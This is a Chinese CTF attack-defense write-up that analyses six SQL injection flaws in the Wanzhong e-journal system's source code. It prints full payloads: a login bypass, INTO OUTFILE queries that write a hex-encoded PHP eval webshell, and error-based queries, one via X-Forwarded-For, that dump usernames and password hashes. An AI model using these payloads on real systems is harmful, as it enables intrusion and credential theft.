万众电子期刊在线阅读系统(awd复现)
网站源码
D盾扫描,没有发现自带后门
在用seay结合功能点进行源码审计
漏洞一:登录框sql注入写webshell
尝试用一句话木马登录,成功登录后台。
万能密码
admin’ or 1=1#
密码随便
登录后发现是万众电子期刊在线阅读系统
源码分析
跟踪function_cleanstr函数,发现只是用htmlspecialchars处理
htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体
预定义的字符有:
在定位_query函数
发现它直接执行了sql语句没有进行过滤检测
考虑到htmlspecialchars()这个函数没有过滤空格空格和( ),所以仍然可以sql注入,下面是sql语句,所有可以用万能密码admin’ or 1=1#直接登录
在登录框进行sql注入写webshell
admin’ UNION SELECT 0x3c3f70687020406576616c28245f504f53545b27636a6d275d293b3f3e,2,3,4,5 into outfile ‘/app/upload/cjm.php’#
成功getshell
漏洞二:前台sql注入getshell
http://192-168-1-5.pvp920.bugku.cn/gbook/index.php?id=1’ UNION SELECT 0x3c3f70687020406576616c28245f504f53545b27636a6d275d293b3f3e into outfile “/app/upload/cjm1.php”–+
源码分析
对传过来的参数id为进行任何处理
直接执行sql语句
漏洞三:前台sql注入getshell
http://192-168-1-5.pvp920.bugku.cn/?type=1’ UNION SELECT 0x3c3f70687020406576616c28245f504f53545b27636a6d275d293b3f3e into outfile “/app/upload/cjm2.php”–+
成功getshell
源码分析
对参数type未进行任何处理
然后直接执行sql未进行任何过滤
漏洞四:前台sql注入获得用户名和密码md5值
对传入的参数进行了htmlspecialchars处理
然后直接执行了sql语句。
跟踪_mysqlnum,未发现进行了过滤
构造sql语句,成功注出用户名和密码的md5值。
http://192-168-1-5.pvp920.bugku.cn/search.php?keyword=a’and (select 1 from (select count(*),concat((select concat(0x3a,username,0x3a,password)from magacms_user limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
漏洞五:前台sql注入获得用户名和密码md5值(可以尝试写入木马)
漏洞在/gbook/index.php进行留言的地方
ip插入下面代码即可注出用户名和密码的md5值。
X-Forwarded-For:111.111.111’or updatexml(1,concat(0x3a,(select concat(username,0x3a,password)from magacms_user limit 1)),0) or’
跟踪这个function_getRealIP()函数
发现未对从客户端获得的ip进行处理
未进行过滤,直接执行了插入语句,所以存在sql注入
漏洞六:前台sql注入获取webshell
同理和上面一样未进行任何过滤
万众电子期刊在线阅读系统(awd复现)相关推荐
- java计算机毕业设计期刊在线投稿系统源码+程序+lw文档+mysql数据库
java计算机毕业设计期刊在线投稿系统源码+程序+lw文档+mysql数据库 java计算机毕业设计期刊在线投稿系统源码+程序+lw文档+mysql数据库 本源码技术栈: 项目架构:B/S架构 开发语 ...
- Springboot期刊在线投稿系统74j50计算机毕业设计-课程设计-期末作业-毕设程序代做
Springboot期刊在线投稿系统74j50计算机毕业设计-课程设计-期末作业-毕设程序代做 [免费赠送源码]Springboot期刊在线投稿系统74j50计算机毕业设计-课程设计-期末作业-毕设程 ...
- 利用VMware虚拟机配置电子专利在线申请系统
本文教你配置一个在线电子专利申请系统,而且一劳永逸.并且提供了一个完善的系统,放置在百度网盘,下载导入VMware即可使用. 相信很多人在自己申请专利,可以用CPC客户端软件,但是频繁调用word插件 ...
- 第1篇:建立电子图书在线阅读系统的事件模型
很多学编程的同学都有类似的感觉:编程代码一看都明白,但让你独自开放软件项目或以团队方式开发软件项目时,却无从下手,代码也不知道怎么写.产生这种情况的主要原因是缺乏实战项目开发经验,没有真正自己主导开发 ...
- 基于Java毕业设计在线阅读系统源码+系统+mysql+lw文档+部署软件
基于Java毕业设计在线阅读系统源码+系统+mysql+lw文档+部署软件 基于Java毕业设计在线阅读系统源码+系统+mysql+lw文档+部署软件 本源码技术栈: 项目架构:B/S架构 开发语言: ...
- JAVA计算机毕业设计期刊在线投稿系统(附源码、数据库)
JAVA计算机毕业设计期刊在线投稿系统(附源码.数据库) 目运行 环境项配置: Jdk1.8 + Tomcat8.5 + Mysql + HBuilderX(Webstorm也行)+ Eclispe( ...
- java毕业设计期刊在线投稿系统源码+lw文档+mybatis+系统+mysql数据库+调试
java毕业设计期刊在线投稿系统源码+lw文档+mybatis+系统+mysql数据库+调试 java毕业设计期刊在线投稿系统源码+lw文档+mybatis+系统+mysql数据库+调试 本源码技术栈 ...
- 【附源码】计算机毕业设计SSM期刊在线投稿系统
项目运行 环境配置: Jdk1.8 + Tomcat7.0 + Mysql + HBuilderX(Webstorm也行)+ Eclispe(IntelliJ IDEA,Eclispe,MyEclis ...
- 微信小程序018小说在线阅读系统书城
管理员的主要功能有: 1.管理员输入账户登陆后台 2.个人中心:管理员修改密码和账户信息 3.用户管理:对注册的用户信息进行删除,查询,添加,修改 4.小说信息管理:对小说信息进行添加,修改,删除,查 ...
最新文章
- 用计算机处理信息可以分为四个过程,大学计算机基础期末考试样题3
- Adobe的学者约翰—沃洛克博士
- Android 权限问题
- 8s pod 查看 的yaml_Kubernetes入门到实战(五)深入浅出详解Pod
- Lucene的一些基本使用方法和概念 (JAVA)
- 积分图像(Integral image)
- php隐藏api,PHP 在 Laravel 中动态隐藏 API 字段
- Verilog实现独立按键消抖(状态机)
- Atitit.图片木马的原理与防范 attilax 总结
- java毕业设计HTML5旅游网站源码+系统+数据库+lw文档+调试运行
- 开源框架ZedGraph的使用
- 物联网工程毕业设计简介
- 内存延时cl_内存延迟和内存时序有什么关系?内存速率和时钟周期| Crucial(英睿达)...
- Android系统优化实操总结
- android studio 2.2 preview4,Android Studio变黄了,2.2 Preview 4 发布
- sizeof求二维数组的大小
- 【下载!】免费经典的计算机教学视频,向孙鑫老师致敬!
- 儿子让我在坚强中求生
- 56282-36-1,Thiol-PEG3-alcohol巯基与马来酰亚胺、OPSS、乙烯砜和过渡金属表面反应
- 使用Blender创建透明材质的物体并导入到Unity中
热门文章
- 语音唤醒真香警告,轻松开启与Siri、小度和小爱的畅聊
- ocsp和ldap 区别_《脑梗塞ocsp分型和治疗》.ppt
- 解决mac终端放大字体重启又变小了
- java基于Springboot餐厅点餐系统-计算机毕业设计
- GCC 9.4 编译error: catching polymorphic type ‘class std::bad_alloc’ by value [-Werror=catch-value=]
- 什么是5G?5G通信关键技术简介
- 互联网晚报 | 8月14日 | ​爱马仕回应16.5万自行车已抢光;​曝苹果新一代不再支持3.5mm耳机插孔;​元宇宙招聘潮开启...
- 7 客户端认证方式 之 client_secret_jwt
- 电脑出现An operating system wasn‘t found,please to Ctrl+alt+del如何解决
- 视频数据集 | 视频动作识别video recognition常用数据集整理